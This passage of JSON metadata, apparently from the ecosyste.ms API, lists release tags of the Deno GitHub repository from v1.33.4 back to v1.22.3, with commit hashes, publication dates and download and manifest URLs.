yste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"